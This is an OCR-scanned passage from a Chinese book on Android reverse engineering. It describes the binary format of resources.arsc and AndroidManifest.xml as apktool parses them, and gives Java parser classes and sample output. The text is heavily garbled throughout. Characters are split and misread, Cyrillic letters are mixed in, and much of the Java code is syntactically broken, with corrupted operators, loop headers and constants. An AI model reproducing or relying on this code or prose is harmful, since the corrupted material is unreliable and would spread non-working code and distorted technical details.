图 5-11 aapt 命 令 输 出 结果 


看 到 解析 出 来 的 内 容 就 是 上 面 解析 的 AndroidManifest.xm|I 内 容 ， 所 以 这 也 是 一 个 解析 方法 。 当 然 aapt 命 令 是 系统 提供 给 
一 个 很 好 的 工具 ， 可 以 在 有 反 编 译 的 过 程 中 借助 这 个 工具 。 这 里 记得 有 一 个 aapt 命 令 束 好 了 ， 它 的 用 途 还 有 很 多 ， 可 以 单独 编译 


成 一 个 resource.arsc 文 件 来 ， 后 面 会 用 到 这 个 命令 。 


提示 : 项 目下 载 地 址 : https: / /github.com/fourbrother/parse_androidxml 


5.3 ”本 音 小 结 


本 章 主要 介绍 Andtoid 编 译 之 后 的 AndtoidManifest.xml 文 件 格式 。 可 以 使 用 网 上 的 一 个 小 工具 AXMLPtintet。 但 这 里 我 也 写 了 一 
个 工具 解析 。 那 么 本 章 内 容 仅仅 是 为 了 解析 AndroidManifest 吗 ? 肯定 不 是 ， 写 本 章 内 容 是 为 后 面 介 绍 反 编译 apK 做 准备 ， 其 实现 在 
有 很 多 人 都 发 现 了 ， 在 使 用 apktool 来 反 编译 apk 的 时 候 经 常 报 出 一 些 异 常 信息 ， 其 实 那 就 是 加 固 的 人 用 来 对 抗 apktool 工 具 的 ， 导 
致 反 编 译 失 败 。 所 以 有 必要 了 解 apktool 的 源码 和 解析 原理 ， 这 样 才能 遇 到 反 编译 失败 时 ， 能 定位 到 问题 ， 修 复 apktool 工 具 即 可 。 


apktool 的 工具 解析 原理 其 实 就 是 解析 AndtoidManifestxml、tesoutce.atsc、 classes.dex 这 三 个 文件 。 还 有 其 他 的 布局 、 资 源 xml 


等 ， 那 么 针对 这 几 个 问题 ， 本 章 专门 解析 XML 文件 的 格式 ， 后 面 章节 还 会 继续 解析 resoutce.arsc 和 classes.dex 文 件 的 格式 。 


第 6 章 ”resource.arsc 文 件 格式 解析 


前 一 齐 介 绍 了 如 何 解析 AndtoidManifest 文 件 格 式 ， 本 章 介 绍 tesoufce.atsc 文 件 格 式 解 析 。tesoutce.atsc 格 式 解 析 很 重要 ， 现 在 很 
多 应 用 为 了 缩减 应 用 包 的 大 小 开始 对 资源 进行 混 消 ， 就 用 到 这 个 文件 格式 ; 应 用 安全 防护 中 可 以 通过 对 资源 混 消 来 做 到 安全 应 
用 ， 也 用 到 这 个 文件 格式 。 本 齐 将 从 资源 文件 id 格式 开始 ， 详 细 解 析 资 源 文 件 的 数据 结构 头 、 字 符 串 、 正 文 等 。 


61 Android 中 资源 文件 id 格 式 


在 使 用 apktool 工 具 进 行 反 编译 的 时 候 ， 会 友 现 有 一 个 文件 res/values/public.xml， 如 图 6-1 所 示 。 


2.0.0гс4 > apktool 2.0.0rc4 » out » res k values TA EF values 


- Am. UR 


~ а 修改 日 期 

d $' ids.xml 2015/10/15 20:43 
е public.xml 2015/10/15 20:43 
*' strings.xml 2015/10/15 20:43 


图 6-1 public.xml x £F 


查看 一 下 public.xml 文 件 内 容 ， 如 图 6-2 所 示 。 


可 以 看 到 ， 这 个 文件 保存 了 apk 中 所 有 id 类 型 和 对 应 的 id 值 。 这 里 面 的 每 个 条 目 内 容 都 包括 如 下 内 容 : 


' type: 类 型 名 


· name: 资源 名 


- id: 资源 的 id 


=- 加 


XML 文档 
XML УВУ 
XML УВУ 


类 型 包括 如 下 几 种 : drawable、menu、layout、string、attr、color、style 等 ， 所 以 会 在 反 编 译 之 后 的 文件 夹 中 看 到 这 几 


个 类 型 的 文件 。 


上 面 介 绍 了 如 何 使 用 apktool 查 看 资源 文件 的 内 容 ， 下 面 介 绍 如 何 来 解析 resource.arsc 文 件 。 


解压 一 个 apk 得 到 对 应 的 resource.arsc 文 件 。 按 照 惯例 ， 每 个 文件 的 格式 朱 述 都 是 有 对 应 的 数据 结构 。resource 也 不 例外 : 
frameworks\base\include\androidfw\ResourceTypes.h， 这 就 是 resource 中 定义 的 所 有 数据 结构 。 下 面 用 一 张 图 详细 表示 出 


resources.arsc 文 件 格 式 ， 如 图 6-3 所 示 。 


«xml version-"1.0" encoding-"utf-8"?- 

|eresources- 
«public type-"drawable" name-"ic launcher" id-"UüÜxTf0200D0" /> 
«public type-"mipmap" name="ic launcher" id-"üx7f03000D" /T 
«public type-"layout" name-"activity main" id-"UüÜxTf0400D0" /T 
«public type-"dimen" name-"activity horizontal margin" id-"UüÜxT7Tf0500D0" /T 
«public type-"dimen" name-"activity vertical margin" id-"O0x7f050001" /T 
«public type-"string" name—-"app name" id-"UÜx7f06D0000D" /- 
«public type-"string" name-"hello world" id-"Üx7f060DD1" > 
«public type-"string" name="action settings" id-"ÜxTf060002" /T 
«public type-"string" name—-"test resource" id-"UxTfD600D3" /T 
«public type-"color" name-"colorPrimary" id-"O0x7f070000" />> 
«public type-"color" name-"colorPrimaryDark" id-"O0x7f070001" /> 
«public type-"color" name-"colorAccent" id-"O0x7f070002" /- 
«public type-"id" name-"textView" id-"O0x7f080000" /- 
«public type-"id" name-"loadPatch" id-"O0x7f080001" /> 
«public type-"id" name-"loadLibrary" id-"0x7f080002" /> 
«public type-"id" name-"cleanPatch" id-"O0x7f080003" /> 
«public type-"id" name-"killSelf" id-"0x7f080004" /- 
«public type-"id" name-"showlInfo" id-")0x7f080005" /- 

-gf resources» 


图 6-2 public.xml 文 件 


F 


Global String Pool 


1 E: 


Package Header 


PO E aee 


Resource Table 


—— 
Type Spec : 

: Package | 

ResTable_entry 偏 移 数 组 | 3 

ResTable entry ROCK agso 资源 项 名 称 index 数据 类 型 实际 数据 | . 
Config List Ї : 

ВЕЅ_ТАВІЕ_ТҮРЕ_ТҮРЕ‹2) ; : : 

i ; | 

i 


图 6-3 resources.arsc 3 £A X, ( 见 书后 彩 图 ) 


62 ”数据 结构 定义 
资源 文件 的 项 目 如 图 6-4 所 示 。 
а 25 ParseAndroidResource 
4 [9 erc 
4 8 com.wjdiankong.parseresource 
: JJ ParseResourceMiain.java 


к IE 
E p mem— O —- gue] р ШШ am. "° Г =”. 


^|BDIFdISCICSUULCCULIDIS.JeVve 
: J| Utils.Java 
«| Resourcelypes.h 
4 Œ com.wjdiankong.parseresource.type 
: J| ResChunkHeader.java 
: J| КеѕоигсеТуре.јама 
: J| ResStringPoolHeader.java 
: J| ResStringPoolkef.java 
: D ResStringPoolSpan.java 
: ñ ResTableConfig.java 
: J| ResTableEntry.java 
: ñ ResTableHeader.java 
: J| ResTableMap.java 
: J| ResTableMapEntry.java 
: J| Res TablePackage.java 
: J| ResTableRef.java 
: J| ResTablelype.java 
: J| Res TablelypeSpec.java 
: J| ResValue.java 
图 6-4 资源 文件 的 数据 结构 
可 见 到 这 里 定义 了 很 多 的 数据 结构 ， 下 面 分 别 介绍 。 
6.2.1 头 部 信息 


Resources.arsc 文 件 格 式 是 由 一 系列 的 chunk 构 成 ， 每 一 个 chunk 均 包含 如 下 结构 的 ResChunk_header， 用 来 描述 这 个 
chunk 的 基本 信息 : 


package com.wjdiankong.parseresource.type; 
import com.wjdiankong.parseresource.Utils; 
public class ResChunkHeader { 


public short type; 
public short headerSize; 
public int size; 


public int getHeaderSize()( 
return 2+2+4; 


aOverride 
publazc String toStringi)( 
return "type:"«Utils.bytesToHexString( 
Utils.int2Byte(type))-«",headerSize:"-«headerSize-«",size:"-«size; 


) 


参数 说 明 : 
- type: 当前 chunk 的 类 型 。 
: headetSize: 当前 chunk 的 关 部 大 小 。 


. size; 当前 chunk 的 大 小 。 


6.2.2 ”资源 索引 表 的 头 部 信息 


Resources.arsc 文 件 的 第 一 个 结构 是 资源 索引 | 表 头 部 ， 其 结构 描述 了 Resources.arsc 文 件 的 大 小 和 资源 包 数 量 : 


package com.wjdiankong.parseresource.type; 
public class ResTableHeader { 


public ResChunkHeader header; 
public int packageCount; 


public ResTableHeader()( 
header - new ResChunkHeader(); 


public int getHeaderSize()(í 


return header.getHeaderSize() + 4; 


) 


@Override 
public String UoString() { 
return "header:"+header.toString()+"Nn" + "packageCount:"+packageCount; 


) 


参数 说 明 : 
- header: 就 是 标准 的 Chunk 头 部 信息 格式 。 
: packageCount: 被 编译 的 资源 包 的 个 数 。 
6.2.3 ЛИШНИЙ BER ЛИШ 
紧 跟 着 资源 索引 表 头 部 的 是 人 资源 项 的 值 字符 串 资源 池 ， 这 个 字符 串 资 源 池 包含 了 所 有 在 资源 包 里 面 定 义 的 资源 项 的 值 字 人 符 


串 ， 字 符 串 资源 池 头 部 的 结构 如 下 : 


package com.wjdiankong.parseresource.type; 
public class ResStringPoolHeader { 


public ResChunkHeader header; 
public inb strindgcournt; 
public int styleCount; 


public final static int SORTED FLAG = 1; 
public final static int UTF8 FLAG = (1««8); 


public int flags; 
public int stringsStart; 


public int stylesStart; 


public ResStringPoolHeader()( 
header = new ResChunkHeader(]); 


public int getHeaderSize()(í( 
return header.getHeaderSize() + 4 + 4 + 4 + 4 + 4; 


@Override 
public String toString()( 
return "header:"-«header.toString()-«"Mn" + "stringCount:"-«stringCount 
-",StyleCount:"-«styleCount-s",flags:"-«flags 
-x",SstringStart:"«stringsStart-",stylesStart:"-4stylesStart; 


参数 说 明 : 

- header: 标准 的 Chunk 头 部 信息 结构 。 

' strineCount: 字符 串 的 个 数 。 

-styleCount: 字符 串 样式 的 个 数 。 

. flags: 字符 串 的 属性 ， 可 取 值 包括 0x000 (UTF-16) ~ 0x001 (字符 串 经 过 排序 ) ~ 0X100 (UTF-8) 和 它们 的 组 合 值 。 


' stringStart: 字符 串 内 容 块 相对 于 其 头 部 的 距离 。 


· stylesStart: 字符 串 样 式 块 相对 于 其 头 部 的 距离 。 


紧 接 着 头 部 的 是 两 个 偏 移 数 组 ， 分 别 是 字符 串 偏 移 数组 和 字符 串 样 式 偏 移 数组 。 这 两 个 偏 移 数组 的 大 小 分 别 等 于 
stringCount 和 styleCount 的 值 ， 而 每 一 个 元 素 的 类 型 都 是 无 符号 整 型 。 整 个 字符 中 资源 池 结 构 如 图 6-5 所 示 。 


String pool 
ResStringPool header 


string offset Array 


style offset Array 


strings 


图 6-5 字符 串 资 源 池 结 构 
字符 串 资源 池 中 的 前 两 个 字 节 为 字符 串 长 度 ， 长 硫 计 算 万 法 如 下 代码 : 


len = (((hbyte & Ox/F) << 8)) | lbyte; 


如 果 字 符 串 编码 格式 为 UTF-8 则 字符 串 以 0X00 作 为 结束 符 ，UTF-16 则 以 0X0000 作 为 结束 符 。 


字符 串 与 字符 串 样式 有 一 一 对 应 的 关系 ， 也 融 是 说 ， 如 果 第 n 个 字符 串 有 样式 ， 则 它 的 样式 摘 述 位 于 样式 块 的 第 n 个 元 泰 。 
字符 串 样式 的 结构 包括 如 下 两 个 结构 体 : ResStringPool _ref 和 ResstringPool span。 一 个 字符 串 可 以 对 应 多 个 
ResStringPool span 和 一 个 ResstringPool ref, ResStringPool span 在 前 拉 述 字符 串 的 样式 ，ResstringPool ref 在 后 固定 值 
为 0XFFFFFFFF 作 为 占 位 符 。 样 式 块 最 后 会 以 两 个 值 为 0XFFFFFFFF 的 ResStringPool_ref 作 为 结束 。 


package com.wjdiankong.parseresource.type; 
public class ResStringPoolRef { 


public int index; 


public int getSize()( 
return 4; 


QaOverride 
public String toString()fí 
return "index:"4index; 


6.2.4 Раскасе =й. 


接着 资源 项 的 值 字符 串 资 源 池 后 面 的 部 分 就 是 Package 数 据 块 ， 这 个 数据 块 记录 编译 包 的 元 数据 ， 头 部 结构 如 下 : 


package com.wjdiankong.parseresource.type; 
public class ResTablePackage { 


public ResChunkHeader header; 
public int id; 

public char[] name = new char[128]; 
public int typeStrings; 

public int lastPublicType; 

public int keyStrings; 

public int lastPublicKey; 


public ВеѕТар1ерРаскаде () { 


header = new ResChunkHeader(); 


aOverride 
public String bBoSrring (0d 
return "header:"«header.toString()-«"Mn"-«",id-"«id 
-",name:"«name.toString()-«",typeStrings:"-«typeStrings 
-x",lastPublicType:"-«lastPublicType-c",keyStrings:" 
-keyStrings-«",lastPublicKey:"-«lastPublicKey; 


23 B3: 

- header: Chunk 的 头 部 信息 数据 结构 。 

14: 包 的 id， 等 于 Package Id， 一 般 用 户 包 的 值 Package Id 为 0X7F， 系 统 资源 包 的 Package Id 为 0X01。 这 个 值 很 重要 的 。 
: name: Lo 


" typeSting: 类 型 字符 串 资源 池 相 对 头 部 的 偏 移 。 


: lastPublicType: 最 后 一 个 导出 的 Public 类 型 字符 串 在 类 型 字符 串 资 源 池 中 的 索引 ， 目 前 这 个 值 设 置 为 类 型 字符 串 资 源 池 的 


元 素 个 数 。 在 解析 的 过 程 中 没 发 现 它 的 用 途 。 
· keyStrings: 资源 项 名 称 字 符 串 相对 头 部 的 偏 移 。 


' lastPublicKey: 最 后 一 个 导出 的 Public 资 源 项 名 称 字符 串 在 资源 项 名 称 字符 串 资源 池 中 的 索引 ， 目 前 这 个 值 设 置 为 资源 项 名 
称 字符 串 资源 池 的 元 素 个 数 。 在 解析 的 过 程 中 没 发 现 它 的 用 途 。 


Package 数 据 块 的 整体 结构 参见 图 6-6。 


String pool 


Type String Pool 


Key String Pool 
lype Specification 
lype Info 


96-6 Package 数据 块 结构 


其 中 Type String Pool 和 Key String Pool 是 两 个 字符 串 资 源 池 ， 结 构 和 人 资源 项 的 值 字 符 串 资源 池 结 构 相 同 ， 分 别 对 应 类 型 
字符 串 资 源 池 和 人 资源 项 名 称 字 符 申 资源 闻 。 

再 接 下 来 的 结构 体 可 能 是 类 型 规范 数据 块 或 者 类 型 资源 项 数据 块 ， 可 以 通过 它们 的 Type 来 识别 ， 类 型 规范 数 据 块 的 Type 为 
RES TABLE TYPE SPEC TYPE， 类 型 资源 项 数据 块 的 Type 为 RES TABLE TYPE TYPE, 


6.2.5 ”类 型 规范 数据 块 


类 型 规 学 数据 块 用 来 换 述 资源 项 的 配置 差异 性 。 通 过 这 个 差 寞 性 质 述 ， 融 可 以 知道 每 一 个 资源 项 的 配置 状况 。 知 道 了 一 个 俊 
源 项 的 配置 状况 之 后 ，Android 人 资源 管理 框架 在 检测 到 设备 的 配置 信息 发 生变 化 之 后 ， 残 可 以 知道 是 否 需 要 重新 加 载 该 资源 项 。 
类 型 规 学 数据 块 是 按照 类 型 来 组 织 的 ， 也 融 是 这， 每 一 种 类 型 都 对 应 有 一 个 类 型 规范 数据 块 。 其 数据 块头 部 结构 如 下 : 


package com.wjdiankong.parseresource.type; 
public class ResTableTypeSpec { 


public final static int SPEC_PUBLIC = 0х40000000; 
public ResChunkHeader header; 

public byte 1а; 

public byte res0; 

public short resl; 

public int entryCount; 

public ResTableTypeSpec()( 


header - new ResChunkHeader(); 


aOverride 
public String toString()( 
return "header:"«header.toString()-«",id:"«id-",resO0:" 
+res0O0+",resl:"+resl+",entryCount:"+entryCounLt; 


参数 说 明 : 
- header: Chunk 的 头 部 信息 结构 。 


1а: 标识 资源 的 Type ID, Type ID 是 指 资源 的 类 型 ID。 资 源 的 类 型 有 animatot、anim、colorf、dtawable、layout、menu、 


raw、 string 和 xml 等 若干 种 ， 每 一 种 都 会 被 赋予 一 个 ID。 
' res0: 保留 ， 始 终 为 0。 
- res]: 保留 ， 始 终 为 0。 
' enttyCount: 等 于 本 类 型 的 资源 项 个 数 ， 指 名 称 相 同 的 资源 项 的 个 数 
ResTable_typeSpec 后 面 紧 跟着 的 是 一 个 大 小 为 entryCount 的 uint32 128, 8—97 SBFH- TES АЈС 


BIER. 


6.2.6 ”资源 类 型 项 数据 块 


资源 类 型 项 数据 块 用 来 摘 述 资源 项 的 具体 信息 ， 这 样 残 可 以 知道 每 一 个 资源 项 的 名 称 、 值 和 配置 等 信息 。 资 源 类 型 项 数据 同 
样 是 按照 类 型 和 配置 来 组 织 的 ， 也 融 是 况 ， 一 个 具有 n 个 配置 的 类 型 一 共 对 应 有 n 个 类 型 资源 项 数据 块 ， 其 数据 块头 部 结构 如 


package com.wjdiankong.parseresource.type; 
public class ResTableType { 


public ResChunkHeader header; 


public final static int NO ENTRY = OxFFFFFFFF; 
public byte id; 

public byte res0; 

public short res1; 

public int entryCount; 

public int entriesStart; 

public ResTableConfig resConfig; 

public ВеѕТар1етТуре () { 


header = new ResChunkHeader(); 
resConfig = new ResTableConfig(); 


public int getSize()(í 
return header.getHeaderSize() + 1 + l + 2 + 4 + 4; 


@Override 
bublic String LOGSET GT 
return "header:"+header.toString()+",id:"+id+",res0:"+res0 
+", resl:"+resl+",entryCount:"+entryCount+",entriesStart:"+entriesStart; 


参数 说 明 : 

- header: Chunk 的 头 部 信息 结构 。 

іа: 标识 资源 的 Type ID. 

- res0: 保留 ， 始 终 为 0。 

tesi: 保留 ， 始 终 为 0。 

entryCount: 等 于 本 类 型 的 资源 项 个 数 ， 指 名 称 相 同 的 资源 项 的 个 数 。 


- entriesStart: 等 于 资源 项 数据 块 相 对 头 部 的 偏 移 值 。 


| 


- resConfig: 指向 一 个 ResTable_config， 用 来 描述 配置 信息 、 地 区 、 语 言 、 分 辨 率 等 。 


ResTable type 后 接着 是 一 个 大 小 为 entryCount 的 uint32 t 数 组 ， 每 一 个 数组 元 素 都 用 于 描述 一 个 资源 类 型 项 数据 块 的 偏 移 
位 置 。 紧 跟 在 这 个 偏 移 数组 后 面 的 是 一 个 大 小 为 entryCount 的 ResTable_entry 数 组 ， 每 一 个 数组 元 素 都 用 来 描述 一 个 资源 项 的 
具体 信息 。ResTable_entry 的 结构 如 下 : 


package com.wjdiankong.parseresource.type; 
import com.wjdiankong.parseresource.ParseResourceUtils; 
public class ResTableEntry { 


public final static int FLAG COMPLEX = 0x0001; 
public final static int FLAG PUBLIC - 0x0002; 


public short size; 
public short flags; 


public ResStringPoolRef key; 


public ResTableEntry()(í 
key - new ResStringPoolRef(); 


public int getSize()( 
return 2-2«2-«key.getSize(); 


@Оуеггіае 
public String toStrzng(i)!i 
return "size:"-«size-e",flags:"«flags-«",key:"-«key.toString() 
-",Str:"-«ParseResourceUtils.getKeyString(key.index); 


ResTable_entry 根 据 flags 的 不 同 ， 后 面 跟随 的 数据 也 不 相同 ， 如 果 flags 为 1， 则 ResTable entryz&ResTable map entry, 
ResTable map_entry 继 承 自 ResTable entry， 其 结构 如 下 : 


package com.wjdiankong.parseresource.type; 
public class ResTableMapEntry extends ResTableEntry(í 


public ResTableRef parent; 
public int count; 


public ResTableMapEntry()(í 
parent - new ResTableRef(); 


aOverride 
public int getSize()( 
return super.getSize() + parent.getSize() + 4; 


QaOverride 
public String toString()(í 
return super.toString() + ",parent:"-«parent.toString()-«",count:"-«count; 


ResTable map_entry 其 后 跟随 count 个 ResTable map 类 型 的 数组 ，ResTable_ map 的 结构 如 下 : 


package com.wjdiankong.parseresource.type; 
public class ResTableMap { 


public ResTableRef name; 
public ResValue value; 


public ResTableMap()(í 
name - new ResTableRef(); 
value = new ResValue(); 


public int getSize()( 


return name.getSize() + value.getSize(); 


aOverride 
public String toString()( 


return name.toString()-«",value:"«value.toString(); 


ЯП9адѕ750, WiResTable епїгу&/5 08у —/“Кеѕ value, fE3XR—" EDBURHJIB, Res valueZ&fJWIT F : 


package com.wjdiankong.parseresource.type; 
import com.wjdiankong.parseresource.ParseResourceUtils; 
public class ResValue { 


//dataType 字段 使 用 的 销量 


public final static int TYPE NULL = 0x00; 

public final static int TYPE REFERENCE = 0x01; 
public final static int TYPE ATTRIBUTE - 0x02; 
public final static int TYPE STRING - 0x03; 

public final static int TYPE FLOAT - 0x04; 

public final static int TYPE DIMENSION = 0x05; 
public final static int TYPE FRACTION - 0x06; 
public final static int TYPE FIRST INT - 0x10; 
public final static int TYPE INT DEC - 0x10; 

public final static int TYPE INT HEX = 0х11; 

public final static int TYPE INT BOOLEAN = 0x12; 
public final static int TYPE FIRST COLOR INT = 0х1с; 
public final static int TYPE INT COLOR ARGBS8 = 0х1с; 
public final static int TYPE INT COLOR RGB8 = 0х1а; 
public final static int TYPE INT COLOR ARGBA = 0х1е; 
public final static int TYPE INT COLOR RGB4 = 0x1f; 
public final static int TYPE LAST COLOR INT = 0х1; 
public final static int TYPE LAST INT = Oxl1f; 
public static final int 

COMPLEX UNIT PX =Ü; 

COMPLEX UNIT DIP =l, 

COMPLEX UNIT SP E 

COMPLEX UNIT PT =, 

COMPLEX UNIT IN =L. 

COMPLEX UNIT MM eg, 
COMPLEX_UNIT_SHIFT = 

COMPLEX UNIT MASK 215, 

COMPLEX UNIT FRACTION EU 

COMPLEX UNIT FRACTION PARENT EL. 

COMPLEX RADIX 23p0 -0, 

COMPLEX RADIX 16p7 -1, 

COMPLEX RADIX 8p15 -2, 

COMPLEX RADIX. 0р23 -3, 

COMPLEX RADIX SHIFT =Z, 

COMPLEX RADIX MASK s 


COMPLEX MANTISSA SHIFT 


COMPLEX MANTISSA MASK =0xFFFFFF; 


public short size; 
public byte res0; 
public byte dataType; 
public int data; 


public int getSize()( 
return 2 + 1 + 1 + 4; 


XU 

size: ResValue 的 头 部 大 小 。 

- res0: 保留 ， 始 终 为 0。 

. dataType: 数据 的 类 型 ， 可 以 从 上 面 的 枚 举 类 型 中 获取 。 
' data: 数据 对 应 的 索引 。 


这 里 看 到 了 有 一 个 转化 的 方法 ， 在 解析 AndroidManifest 文 件 的 时 候 也 用 到 了 这 个 方法 。 


63 ”解析 代码 


因为 篇 幅 的 原因 ， 这 里 就 不 把 所 有 的 代码 都 粘贴 出 来 了 ， 后 面 会 列 出 代码 下 载 地 址 ， 首 先 读 取 resource.arsc 文 件 到 一 个 字 
节 数 组 ， 然 后 开始 解析 。 


6.3.1 解析 头 部 信息 


头 部 信息 代码 如 下 : 


/** 
х (param src 
ЫЎ; 
public static void parseResTableHeaderChunk(byte[] зүс) { 
ResTableHeader resTableHeader = new ResTableHeader() 


resTableHeader.header - parseResChunkHeader (src, 0); 


resStringPoolChunkOffset - resTableHeader.header.headerSize; 


/ / 解析 PackageCount 个 数 ( — apk 可 能 包含 多 个 Package 资源 ) 
byte[] packageCountByte = Utils.copyByte(src, resTableHeader.header. 
getHeaderSize(), 4); 


resTableHeader.packageCount = Utils.byte2int(packageCountByte); 


解析 结果 如 下 : 


El Console X | 
«terminated» ParseResourceMain [Java Application] CAProgram FilesWava 
parse restable header... 


header:header:type:00 00 00 02 ,headerSize:12,size:6384 
packageCount:1 


RET RISE 3 ER VAGA F : 


/** 
* 解析 Resource.arsc 文件 中 所 有 字符 串 内 容 
* @рагаш src 
Ы) 
public static void parseResStringPoolChunk(byte[] src)t 
ResStringPoolHeader stringPoolHeader - 
parseStringPoolChunk(src, resStringList, resStringPoolChunkOffset); 
packageChunkOffset = resStringPoolChunkOffset + stringPoolHeader.header. 
size; 


这 里 有 一 个 核心 的 方法 parseStringPoolChunk: 


统一 解析 字符 串 内 容 

@рагаш src 

@рагаш stringList 

@рагаш stringOffset 

@return 

/ 

public static ResStringPoolHeader parseStringPoolChunk( 

byte[] src, ArrayList«String» stringList, int stringOffset)(í 
ResStringPoolHeader stringPoolHeader - new ResStringPoolHeader(); 


* + * * * * X 


// 解析 头 部 信息 


stringPoolHeader.header = parseResChunkHeader(src, stringOffset); 


System.out.println("header size:"-«stringPoolHeader.header.headerSize); 
System.out.println("size:"«stringPoolHeader.header.size); 


int offset = stringOffset + stringPoolHeader.header.getHeaderSize(); 


/ / 获取 字符 串 的 个 数 
byte[] stringCountByte = Utils.copyByte(src, offset, 4); 
stringPoolHeader.stringCount = Utils.byte2int(stringCountByte); 


/ / 解析 样式 的 个 数 
byte[] styleCountByte = Utils.copyByte(src, offset+4, 4); 
stringPoolHeader.styleCount = Utils.byte2int(styleCountByte); 


/ / 这 里 表示 字符 串 的 格式 :UTF-8/UTF-16 

byte[] flagByte = Utils.copyByte(src, offset+8, 4); 
System.out.println("flag:"+Utils.bytesToHexString(flagByte)); 
stringPoolHeader.flags = Utils.byte2int(flagByte); 


/ / 字符 串 内 容 的 开始 位 置 


byte[] stringStartByte = Utils.copyByte(src, offset+12, 4); 
stringPoolHeader.stringsStart = Utils.byte2int(stringStartByte); 
System.out.println("string start:"«Utils.bytesToHexString(stringStartByte)); 


/ / 样式 内 容 的 开始 位 置 

byte[] sytleStartByte = Utils.copyByte(src, offset+16, 4); 
stringPoolHeader.stylesStart = Utils.byte2int(sytleStartByte); 
System.out.println("style start:"4Utils.bytesToHexString(sytleStartByte)); 


/ / 获取 字符 串 内 容 的 索引 数组 和 样式 内 容 的 索引 数组 
int[] stringIndexAry = new int[stringPoolHeader.stringCount]; 
int[] stylelIndexAry - new int[stringPoolHeader.styleCount]; 


System.out.println("string count:"«stringPoolHeader.stringCount); 
System.out.println("style count:"«stringPoolHeader.styleCount); 


int stringIndex = offset + 20; 
for(int i20;i«stringPoolHeader.stringCount;i-«-«)f( 
stringlIndexAry[i] = Utils.byte2int(Utils.copyByte(src, stringlIndex-«i*4, 4)); 


int stylelndex = stringIndex + 4*stringPoolHeader.stringCount; 
for(int i20;i«stringPoolHeader.styleCount;i-«-«)( 
stylelndexAry[i] = Utils.byte2int(Utils.copyvByte(src, stylelIndex-«i*4, 4)); 


/ / 每 个 字符 串 的 头 两 个 字 节 的 最 后 一 个 字 节 是 字符 串 的 长 度 
// 这 里 获取 所 有 字符 串 的 内 容 
int stringContentIndex = stylelndex + stringPoolHeader.styleCount*4; 
System.out.println("string index:"+ 
Utils.bytesToHexString(Utils.int2Byte(stringContentIndex))); 
int index - 0; 
while(index < stringPoolHeader.stringCount)(í 
byte[] stringSizeByte = Utils.copyvByte(src, stringContentIndex, 2); 
int stringSize = (stringSizeByte[1] & 0х7Е); 
if(stringSize != 0) { 
String Val e "*: 
tryt 
val - new String( 
Utils.copyvByte(src, stringContentIndex-«2, stringSize), 
"utf-8"); 
)catch(Exception е) { 
System.out.println("string encode error:"«e.toString()); 


} 

stringList.add(val); 
Jelse( 

stringList.add(""); 


) 


stringContentlIndex += (stringSize-43); 
іпаех++; 

} 

for(String str : stringList)(í( 


System.out.println("str:"«str); 


return stringPoolHeader; 


这 里 在 得 到 一 个 字符 串 的 时 候 ， 需 要 得 到 字符 串 的 开始 位 置 和 字符 串 的 大 小 即 可 ， 这 点 和 解析 AndroidManifest.xml 文 件 中 
的 字符 串 原 理 是 一 样 的 。 融 是 一 个 字符 串 的 头 两 个 字 节 中 的 最 后 一 个 字 节 是 字符 串 的 长 度 。 这 里 在 解析 完 字 符 串 乙 后 ， 需 要 用 一 
个 列表 将 其 仓储 起 来 ， 后 面 要 用 到 ， 需 要 通过 索引 来 取 字 人 符 串 内 容 。 


解析 结果 如 下 : 


parse resstring pool chunk... 

header size:28 

size:1220 

flag:00 01 00 00 

string start:c4 00 00 00 

style start:00 00 00 00 

string count:42 

style count:e 

string index:00 өе ӨӨ ае 
str:res/drawable/arrow.png 
str:res/drawable/gdticon.png 
str:res/drawable/gridbt.png 
str:res/drawable/header arrow.png 
str:res/drawable/icon1.png 
str:res/drawable/listview item background.9.png 
str:res/drawable/logo.png 
str:res/drawable/main background.png 
str:res/layout/activity banner demo.xml 
str:res/layout/activity fullscreen.xml 
str:res/layout/activity gdtnativead demo.xml 
str:res/layout/activity list view.xml 
str:res/layout/activity main demo.xml 
str:res/layout/headercontainer.xml 
str:res/layout/nativelistitem.xml 
str:res/menu/custom feeds2.xml 
str:Hello world! 

str:Hello Banner Demo! 

str:Settings 

Str : 刷新 广告 

Str :关闭 /展开 容器 

Str : SDK 测试 应 用 

Str :浏览 

str:TestBrowser 

str:Banner 广 告 

str: 广 点 通 SDK Demo 

str: 请 输入 广告 位 ID 

str:positionId 

str: 请 输入 广告 为 1d 

Str: 插 屏 广告 

Str: 开 屏 广告 


с-н + Гатил г Riittan 


63.3 ”解析 包 信息 


解析 包 信 息 代 码 如 下 : 


/** 
* 解析 Package 信息 
х (àparam src 
ud i 
public static void parsePackage(byte[] ѕгс) { 
System.out.println("pchunkoffset:"-« 
Utils.bytesToHexString(Utils.int2Byte(packageChunkOffset))); 
ResTablePackage resTabPackage - new ResTablePackage(); 
// 解析 头 部 信息 


resTabPackage.header = parseResChunkHeader(src, packageChunkOffset); 


System.out.println("package size:"«resTabPackage.header.headerSize); 
int offset = packageChunkOffset + resTabPackage.header.getHeaderSize(); 


/ / 解析 packId 

byte[] idByte = Utils.copyvByte(src, offset, 4); 
resTabPackage.id = Utils.byte2int(idByte); 
packId = resTabPackage.igd; 


/ / SEE, А 

System.out.printlin("package offset:"«Utils.bytesToHexString(Utils. 
int2Byte(offsets«4))); 

// 这 里 的 128 是 这 个 字段 的 大 小 ， 可 以 查看 类 型 说 明 ， 是 char 类 型 的 ， 所 以 要 乘 以 2 

byte[] nameByte = Utils.copyByte(src, offset+4, 128*2); 

String packageName = new String(nameByte); 

packageName - Utils.filterStringNull(packageName); 

System.out.println("pkgName:"-«packageName); 


// 解析 类 型 字符 串 的 偏 移 值 

byte[] typeStringsByte = Utils.copyByte(src, offset+4+128*2, 4); 
resTabPackage.typeStrings = Utils.byte2int(typeStringsByte); 
System.out.printlin("typeString:"-«resTabPackage.typeStrings); 


// 解析 1astPublicType 字段 
byte[] lastPublicType = Utils.copyByte(src, offset+8+128*2, 4); 
resTabPackage.lastPublicType = Utils.byte2int(lastPublicType); 


/ / 解析 keyString 字符 串 的 偏 移 值 

byte[] keyStrings = Utils.copyByte(src, offset+12+128*2, 4); 
resTabPackage.keyStrings = Utils.byte2int(keyStrings); 
System.out.println("keyString:"-«resTabPackage.keyStrings); 


/ / 解析 1astPublicKey 
byte[] lastPublicKey = Utils.copyByte(src, offset«12-«128*2, 4); 
resTabPackage.lastPublicKey = Utils.byte2int(lastPublicKey); 


// 这 里 获取 类 型 字符 串 的 偏 移 值 和 类 型 字符 串 的 偏 移 值 
keyStringPoolChunkOffset = (packageChunkOffset+resTabPackage.keyStrings); 
typeStringPoolChunkOffset = (packageChunkOffset+resTabPackage.typeStrings); 


